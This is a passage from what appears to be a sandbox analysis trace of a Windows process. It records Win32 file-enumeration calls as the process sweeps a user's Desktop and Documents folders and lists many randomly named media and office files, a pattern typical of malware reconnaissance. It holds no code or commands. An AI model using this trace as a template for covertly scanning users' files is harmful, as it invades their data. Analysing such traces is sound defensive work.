ftLastWriteTime.dwHighDateTime=0x1d8229b, nFileSizeHigh=0x0, nFileSizeLow=0x3ce8, dwReserved0=0x0, dwReserved1=0x0, cFileName="53CjZJnv.avi", cAlternateFileName="")) returned 1 [0256.697] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4e4e6b0, ftCreationTime.dwHighDateTime=0x1d820d8, ftLastAccessTime.dwLowDateTime=0xc4a5a6e0, ftLastAccessTime.dwHighDateTime=0x1d82843, ftLastWriteTime.dwLowDateTime=0xc4a5a6e0, ftLastWriteTime.dwHighDateTime=0x1d82843, nFileSizeHigh=0x0, nFileSizeLow=0x12cf1, dwReserved0=0x0, dwReserved1=0x0, cFileName="7pK8Q9_TXKB_8t_99Nak.gif", cAlternateFileName="7PK8Q9~1.GIF")) returned 1 [0256.697] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8f11920, ftCreationTime.dwHighDateTime=0x1d82125, ftLastAccessTime.dwLowDateTime=0xf429e240, ftLastAccessTime.dwHighDateTime=0x1d8282b, ftLastWriteTime.dwLowDateTime=0xf429e240, ftLastWriteTime.dwHighDateTime=0x1d8282b, nFileSizeHigh=0x0, nFileSizeLow=0x16cb9, dwReserved0=0x0, dwReserved1=0x0, cFileName="C5Fa.mkv", cAlternateFileName="")) returned 1 [0256.697] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29167d50, ftCreationTime.dwHighDateTime=0x1d82864, ftLastAccessTime.dwLowDateTime=0xd13c7da0, ftLastAccessTime.dwHighDateTime=0x1d8294e, ftLastWriteTime.dwLowDateTime=0xd13c7da0, ftLastWriteTime.dwHighDateTime=0x1d8294e, nFileSizeHigh=0x0, nFileSizeLow=0x14079, dwReserved0=0x0, dwReserved1=0x0, cFileName="l3gSlVaocrgHaHht.m4a", cAlternateFileName="L3GSLV~1.M4A")) returned 1 [0256.697] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83e89880, ftCreationTime.dwHighDateTime=0x1d81f90, ftLastAccessTime.dwLowDateTime=0xb6b5ed80, ftLastAccessTime.dwHighDateTime=0x1d824e0, ftLastWriteTime.dwLowDateTime=0xb6b5ed80, ftLastWriteTime.dwHighDateTime=0x1d824e0, nFileSizeHigh=0x0, nFileSizeLow=0xd5cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="pQ4D7olyLasPf6h0yK.flv", cAlternateFileName="PQ4D7O~1.FLV")) returned 1 [0256.697] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc836b4a0, ftCreationTime.dwHighDateTime=0x1d81f76, ftLastAccessTime.dwLowDateTime=0xf4cdf2f0, ftLastAccessTime.dwHighDateTime=0x1d82695, ftLastWriteTime.dwLowDateTime=0xf4cdf2f0, ftLastWriteTime.dwHighDateTime=0x1d82695, nFileSizeHigh=0x0, nFileSizeLow=0xffcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="ynl0nO8fmos3T.mp4", cAlternateFileName="YNL0NO~1.MP4")) returned 1 [0256.698] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x475a6cb0, ftCreationTime.dwHighDateTime=0x1d81eb2, ftLastAccessTime.dwLowDateTime=0xefa2da70, ftLastAccessTime.dwHighDateTime=0x1d828a2, ftLastWriteTime.dwLowDateTime=0xefa2da70, ftLastWriteTime.dwHighDateTime=0x1d828a2, nFileSizeHigh=0x0, nFileSizeLow=0x135f, dwReserved0=0x0, dwReserved1=0x0, cFileName="_2Qs2D.odp", cAlternateFileName="")) returned 1 [0256.698] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.698] FindClose (in: hFindFile=0x8fe900 | out: hFindFile=0x8fe900) returned 1 [0256.699] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.699] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\*", lpFindFileData=0x123a34e0 | out: lpFindFileData=0x123a34e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ccf620, ftCreationTime.dwHighDateTime=0x1d82620, ftLastAccessTime.dwLowDateTime=0x58140b70, ftLastAccessTime.dwHighDateTime=0x1d8286b, ftLastWriteTime.dwLowDateTime=0x58140b70, ftLastWriteTime.dwHighDateTime=0x1d8286b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fee80 [0256.699] FindNextFileW (in: hFindFile=0x8fee80, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ccf620, ftCreationTime.dwHighDateTime=0x1d82620, ftLastAccessTime.dwLowDateTime=0x58140b70, ftLastAccessTime.dwHighDateTime=0x1d8286b, ftLastWriteTime.dwLowDateTime=0x58140b70, ftLastWriteTime.dwHighDateTime=0x1d8286b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.699] FindNextFileW (in: hFindFile=0x8fee80, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe15e32c0, ftCreationTime.dwHighDateTime=0x1d8283e, ftLastAccessTime.dwLowDateTime=0x8d2c1dc0, ftLastAccessTime.dwHighDateTime=0x1d8286b, ftLastWriteTime.dwLowDateTime=0x8d2c1dc0, ftLastWriteTime.dwHighDateTime=0x1d8286b, nFileSizeHigh=0x0, nFileSizeLow=0xc8b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="-tLx.jpg", cAlternateFileName="")) returned 1 [0256.699] FindNextFileW (in: hFindFile=0x8fee80, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78c69a20, ftCreationTime.dwHighDateTime=0x1d823f9, ftLastAccessTime.dwLowDateTime=0xb7699030, ftLastAccessTime.dwHighDateTime=0x1d827cc, ftLastWriteTime.dwLowDateTime=0xb7699030, ftLastWriteTime.dwHighDateTime=0x1d827cc, nFileSizeHigh=0x0, nFileSizeLow=0x11885, dwReserved0=0x0, dwReserved1=0x0, cFileName="2I YP.mkv", cAlternateFileName="2IYP~1.MKV")) returned 1 [0256.700] FindNextFileW (in: hFindFile=0x8fee80, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cd5b990, ftCreationTime.dwHighDateTime=0x1d8261e, ftLastAccessTime.dwLowDateTime=0x4cb1fa00, ftLastAccessTime.dwHighDateTime=0x1d827f6, ftLastWriteTime.dwLowDateTime=0x4cb1fa00, ftLastWriteTime.dwHighDateTime=0x1d827f6, nFileSizeHigh=0x0, nFileSizeLow=0x17204, dwReserved0=0x0, dwReserved1=0x0, cFileName="RqMHt Jbqykr-i2R.jpg", cAlternateFileName="RQMHTJ~1.JPG")) returned 1 [0256.700] FindNextFileW (in: hFindFile=0x8fee80, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbcc3a0, ftCreationTime.dwHighDateTime=0x1d82912, ftLastAccessTime.dwLowDateTime=0x7fd9bc30, ftLastAccessTime.dwHighDateTime=0x1d829f2, ftLastWriteTime.dwLowDateTime=0x7fd9bc30, ftLastWriteTime.dwHighDateTime=0x1d829f2, nFileSizeHigh=0x0, nFileSizeLow=0xc05e, dwReserved0=0x0, dwReserved1=0x0, cFileName="WqsBnn5V5.flv", cAlternateFileName="WQSBNN~1.FLV")) returned 1 [0256.700] FindNextFileW (in: hFindFile=0x8fee80, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bba3330, ftCreationTime.dwHighDateTime=0x1d81a3f, ftLastAccessTime.dwLowDateTime=0xbf7e9390, ftLastAccessTime.dwHighDateTime=0x1d822dd, ftLastWriteTime.dwLowDateTime=0xbf7e9390, ftLastWriteTime.dwHighDateTime=0x1d822dd, nFileSizeHigh=0x0, nFileSizeLow=0x51a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="YRFgwGf 0zYgcMX.flv", cAlternateFileName="YRFGWG~1.FLV")) returned 1 [0256.700] FindNextFileW (in: hFindFile=0x8fee80, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e7466e0, ftCreationTime.dwHighDateTime=0x1d826be, ftLastAccessTime.dwLowDateTime=0x37143bb0, ftLastAccessTime.dwHighDateTime=0x1d828ee, ftLastWriteTime.dwLowDateTime=0x37143bb0, ftLastWriteTime.dwHighDateTime=0x1d828ee, nFileSizeHigh=0x0, nFileSizeLow=0x10eed, dwReserved0=0x0, dwReserved1=0x0, cFileName="zMPTOdNQ.jpg", cAlternateFileName="")) returned 1 [0256.700] FindNextFileW (in: hFindFile=0x8fee80, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.700] FindClose (in: hFindFile=0x8fee80 | out: hFindFile=0x8fee80) returned 1 [0256.702] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.702] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\*", lpFindFileData=0x123a34e0 | out: lpFindFileData=0x123a34e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaf22aa0, ftCreationTime.dwHighDateTime=0x1d8239a, ftLastAccessTime.dwLowDateTime=0x55cc82e0, ftLastAccessTime.dwHighDateTime=0x1d8285f, ftLastWriteTime.dwLowDateTime=0x55cc82e0, ftLastWriteTime.dwHighDateTime=0x1d8285f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fed40 [0256.702] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaf22aa0, ftCreationTime.dwHighDateTime=0x1d8239a, ftLastAccessTime.dwLowDateTime=0x55cc82e0, ftLastAccessTime.dwHighDateTime=0x1d8285f, ftLastWriteTime.dwLowDateTime=0x55cc82e0, ftLastWriteTime.dwHighDateTime=0x1d8285f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.702] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dd86490, ftCreationTime.dwHighDateTime=0x1d822df, ftLastAccessTime.dwLowDateTime=0x75a91aa0, ftLastAccessTime.dwHighDateTime=0x1d82824, ftLastWriteTime.dwLowDateTime=0x75a91aa0, ftLastWriteTime.dwHighDateTime=0x1d82824, nFileSizeHigh=0x0, nFileSizeLow=0x17762, dwReserved0=0x0, dwReserved1=0x0, cFileName="1s4d3CDN.flv", cAlternateFileName="")) returned 1 [0256.703] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5afef70, ftCreationTime.dwHighDateTime=0x1d81b19, ftLastAccessTime.dwLowDateTime=0x86659530, ftLastAccessTime.dwHighDateTime=0x1d81c08, ftLastWriteTime.dwLowDateTime=0x86659530, ftLastWriteTime.dwHighDateTime=0x1d81c08, nFileSizeHigh=0x0, nFileSizeLow=0x14adf, dwReserved0=0x0, dwReserved1=0x0, cFileName="7g-3nq2zvxE4VIk.png", cAlternateFileName="7G-3NQ~1.PNG")) returned 1 [0256.703] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e53c90, ftCreationTime.dwHighDateTime=0x1d82262, ftLastAccessTime.dwLowDateTime=0xf44b8ce0, ftLastAccessTime.dwHighDateTime=0x1d8262f, ftLastWriteTime.dwLowDateTime=0xf44b8ce0, ftLastWriteTime.dwHighDateTime=0x1d8262f, nFileSizeHigh=0x0, nFileSizeLow=0xaa2d, dwReserved0=0x0, dwReserved1=0x0, cFileName="dbMm7g.png", cAlternateFileName="")) returned 1 [0256.703] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbe7b4e0, ftCreationTime.dwHighDateTime=0x1d81cc1, ftLastAccessTime.dwLowDateTime=0x1e4e6920, ftLastAccessTime.dwHighDateTime=0x1d827c7, ftLastWriteTime.dwLowDateTime=0x1e4e6920, ftLastWriteTime.dwHighDateTime=0x1d827c7, nFileSizeHigh=0x0, nFileSizeLow=0x18cf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-STq-jQ5hYtJhIu5S.ots", cAlternateFileName="P-STQ-~1.OTS")) returned 1 [0256.703] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d81b8d0, ftCreationTime.dwHighDateTime=0x1d825c8, ftLastAccessTime.dwLowDateTime=0xa2788080, ftLastAccessTime.dwHighDateTime=0x1d8285f, ftLastWriteTime.dwLowDateTime=0xa2788080, ftLastWriteTime.dwHighDateTime=0x1d8285f, nFileSizeHigh=0x0, nFileSizeLow=0x36de, dwReserved0=0x0, dwReserved1=0x0, cFileName="pVnv3JR1eBRll.xls", cAlternateFileName="PVNV3J~1.XLS")) returned 1 [0256.703] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b4561a0, ftCreationTime.dwHighDateTime=0x1d81b60, ftLastAccessTime.dwLowDateTime=0x13edeef0, ftLastAccessTime.dwHighDateTime=0x1d8253e, ftLastWriteTime.dwLowDateTime=0x13edeef0, ftLastWriteTime.dwHighDateTime=0x1d8253e, nFileSizeHigh=0x0, nFileSizeLow=0x8f41, dwReserved0=0x0, dwReserved1=0x0, cFileName="xxY CYyYbKsjdn.swf", cAlternateFileName="XXYCYY~1.SWF")) returned 1 [0256.703] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d12cf70, ftCreationTime.dwHighDateTime=0x1d82012, ftLastAccessTime.dwLowDateTime=0xda5937f0, ftLastAccessTime.dwHighDateTime=0x1d824aa, ftLastWriteTime.dwLowDateTime=0xda5937f0, ftLastWriteTime.dwHighDateTime=0x1d824aa, nFileSizeHigh=0x0, nFileSizeLow=0x2282, dwReserved0=0x0, dwReserved1=0x0, cFileName="YqAV-p.bmp", cAlternateFileName="")) returned 1 [0256.703] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.703] FindClose (in: hFindFile=0x8fed40 | out: hFindFile=0x8fed40) returned 1 [0256.705] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents" (normalized: "c:\\users\\rdhj0cnfevzx\\documents"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.705] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf7e0e7cc, ftLastAccessTime.dwHighDateTime=0x1d82a28, ftLastWriteTime.dwLowDateTime=0xf7e0e7cc, ftLastWriteTime.dwHighDateTime=0x1d82a28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fef00 [0256.705] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf7e0e7cc, ftLastAccessTime.dwHighDateTime=0x1d82a28, ftLastWriteTime.dwLowDateTime=0xf7e0e7cc, ftLastWriteTime.dwHighDateTime=0x1d82a28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.705] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea4eb3e0, ftCreationTime.dwHighDateTime=0x1d7c9bc, ftLastAccessTime.dwLowDateTime=0xfd4e7bb0, ftLastAccessTime.dwHighDateTime=0x1d81719, ftLastWriteTime.dwLowDateTime=0xfd4e7bb0, ftLastWriteTime.dwHighDateTime=0x1d81719, nFileSizeHigh=0x0, nFileSizeLow=0x273d, dwReserved0=0x0, dwReserved1=0x0, cFileName="4hjR_qw1PrF.docx", cAlternateFileName="4HJR_Q~1.DOC")) returned 1 [0256.705] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa110f770, ftCreationTime.dwHighDateTime=0x1d7fa8f, ftLastAccessTime.dwLowDateTime=0x7ab3fe90, ftLastAccessTime.dwHighDateTime=0x1d82372, ftLastWriteTime.dwLowDateTime=0x7ab3fe90, ftLastWriteTime.dwHighDateTime=0x1d82372, nFileSizeHigh=0x0, nFileSizeLow=0xc74a, dwReserved0=0x0, dwReserved1=0x0, cFileName="4R8gdYA15.docx", cAlternateFileName="4R8GDY~1.DOC")) returned 1 [0256.706] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe43ca250, ftCreationTime.dwHighDateTime=0x1d82614, ftLastAccessTime.dwLowDateTime=0x4a5f16d0, ftLastAccessTime.dwHighDateTime=0x1d8289a, ftLastWriteTime.dwLowDateTime=0x4a5f16d0, ftLastWriteTime.dwHighDateTime=0x1d8289a, nFileSizeHigh=0x0, nFileSizeLow=0x9d10, dwReserved0=0x0, dwReserved1=0x0, cFileName="5yfr.docx", cAlternateFileName="5YFR~1.DOC")) returned 1 [0256.706] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ac81000, ftCreationTime.dwHighDateTime=0x1d821f7, ftLastAccessTime.dwLowDateTime=0xc9958540, ftLastAccessTime.dwHighDateTime=0x1d82761, ftLastWriteTime.dwLowDateTime=0xc9958540, ftLastWriteTime.dwHighDateTime=0x1d82761, nFileSizeHigh=0x0, nFileSizeLow=0x165ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="9Q7-bFR.xlsx", cAlternateFileName="9Q7-BF~1.XLS")) returned 1 [0256.706] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb313a840, ftCreationTime.dwHighDateTime=0x1d81cc3, ftLastAccessTime.dwLowDateTime=0x793b780, ftLastAccessTime.dwHighDateTime=0x1d824ed, ftLastWriteTime.dwLowDateTime=0x793b780, ftLastWriteTime.dwHighDateTime=0x1d824ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="baXS", cAlternateFileName="")) returned 1 [0256.706] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bccd650, ftCreationTime.dwHighDateTime=0x1d82303, ftLastAccessTime.dwLowDateTime=0xf03eb2a0, ftLastAccessTime.dwHighDateTime=0x1d8237b, ftLastWriteTime.dwLowDateTime=0xf03eb2a0, ftLastWriteTime.dwHighDateTime=0x1d8237b, nFileSizeHigh=0x0, nFileSizeLow=0x22d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crvhk0MgLr2QKx _m.pdf", cAlternateFileName="CRVHK0~1.PDF")) returned 1 [0256.706] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x417427f0, ftCreationTime.dwHighDateTime=0x1d8026a, ftLastAccessTime.dwLowDateTime=0x7354b610, ftLastAccessTime.dwHighDateTime=0x1d805c4, ftLastWriteTime.dwLowDateTime=0x7354b610, ftLastWriteTime.dwHighDateTime=0x1d805c4, nFileSizeHigh=0x0, nFileSizeLow=0x13ce4, dwReserved0=0x0, dwReserved1=0x0, cFileName="CX3dvz.pptx", cAlternateFileName="CX3DVZ~1.PPT")) returned 1 [0256.706] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43649a85, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43649a85, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4372e947, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.706] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71628800, ftCreationTime.dwHighDateTime=0x1d8031c, ftLastAccessTime.dwLowDateTime=0xdcf786d0, ftLastAccessTime.dwHighDateTime=0x1d81733, ftLastWriteTime.dwLowDateTime=0xdcf786d0, ftLastWriteTime.dwHighDateTime=0x1d81733, nFileSizeHigh=0x0, nFileSizeLow=0x1558b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ej4CnCJUCwn5 nF.docx", cAlternateFileName="EJ4CNC~1.DOC")) returned 1 [0256.706] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaa214a0, ftCreationTime.dwHighDateTime=0x1d82779, ftLastAccessTime.dwLowDateTime=0xaebdac40, ftLastAccessTime.dwHighDateTime=0x1d82953, ftLastWriteTime.dwLowDateTime=0xaebdac40, ftLastWriteTime.dwHighDateTime=0x1d82953, nFileSizeHigh=0x0, nFileSizeLow=0x1597f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eo3LI.docx", cAlternateFileName="EO3LI~1.DOC")) returned 1 [0256.706] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2b3c9e0, ftCreationTime.dwHighDateTime=0x1d7b3f4, ftLastAccessTime.dwLowDateTime=0xb23dd020, ftLastAccessTime.dwHighDateTime=0x1d7c049, ftLastWriteTime.dwLowDateTime=0xb23dd020, ftLastWriteTime.dwHighDateTime=0x1d7c049, nFileSizeHigh=0x0, nFileSizeLow=0x186a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="gCYkDpyT1k8vMjkIl.docx", cAlternateFileName="GCYKDP~1.DOC")) returned 1 [0256.706] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b81f5a0, ftCreationTime.dwHighDateTime=0x1d81da8, ftLastAccessTime.dwLowDateTime=0xbf76ef20, ftLastAccessTime.dwHighDateTime=0x1d82461, ftLastWriteTime.dwLowDateTime=0xbf76ef20, ftLastWriteTime.dwHighDateTime=0x1d82461, nFileSizeHigh=0x0, nFileSizeLow=0x7809, dwReserved0=0x0, dwReserved1=0x0, cFileName="GPvOBFfXu_XAefB06.doc", cAlternateFileName="GPVOBF~1.DOC")) returned 1 [0256.706] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x685fd510, ftCreationTime.dwHighDateTime=0x1d7dde1, ftLastAccessTime.dwLowDateTime=0x96217190, ftLastAccessTime.dwHighDateTime=0x1d8104d, ftLastWriteTime.dwLowDateTime=0x96217190, ftLastWriteTime.dwHighDateTime=0x1d8104d, nFileSizeHigh=0x0, nFileSizeLow=0x413b, dwReserved0=0x0, dwReserved1=0x0, cFileName="i4iTuepd632fb1KkZ.pptx", cAlternateFileName="I4ITUE~1.PPT")) returned 1 [0256.706] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65f23bf0, ftCreationTime.dwHighDateTime=0x1d7b9fc, ftLastAccessTime.dwLowDateTime=0x4ed57220, ftLastAccessTime.dwHighDateTime=0x1d809ed, ftLastWriteTime.dwLowDateTime=0x4ed57220, ftLastWriteTime.dwHighDateTime=0x1d809ed, nFileSizeHigh=0x0, nFileSizeLow=0x18ec3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ifzi1.xlsx", cAlternateFileName="IFZI1~1.XLS")) returned 1 [0256.706] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0256.706] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, 